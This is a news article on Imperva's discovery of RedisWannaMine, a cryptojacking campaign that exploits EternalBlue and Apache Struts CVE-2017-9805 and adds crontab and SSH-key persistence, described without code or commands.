RedisWannaMine is a sophisticated attack which targets servers to fraudulently mine cryptocurrency.
Researchers have uncovered a new cryptojacking scheme which utilizes the leaked NSA exploit EternalBlue to infect vulnerable Windows servers.
On Thursday, security professionals from Imperva revealed the attack, warning that this latest scheme is far more sophisticated than most recorded cryptojacking attempts, which are generally rather simple in nature.
The new attack, called RedisWannaMine, targets servers to mine cryptocurrency and “demonstrates a worm-like behavior combined with advanced exploits to increase the attackers’ infection rate and fatten their [operator] wallets.”
When a target server has been identified, the malware exploits CVE-2017-9805, an Apache Struts vulnerability which impacts the Struts REST plugin with XStream handler.
If exploited, the security flaw allows attackers to remotely execute code without authentication on an application server.
This vulnerability is used by the attackers to run a shell command which downloads cryptocurrency mining malware.
However, the downloader used is more sophisticated than usual, as it also gains persistency through new server entries in crontab, and gains remote access to a victim machine through new SSH key entries in the authorized keys sector, as well as the system’s iptables.
Other packages are also downloaded using standard Linux package managers, and one particular GitHub tool, a TCP port scanner called masscan, is also included in the payload.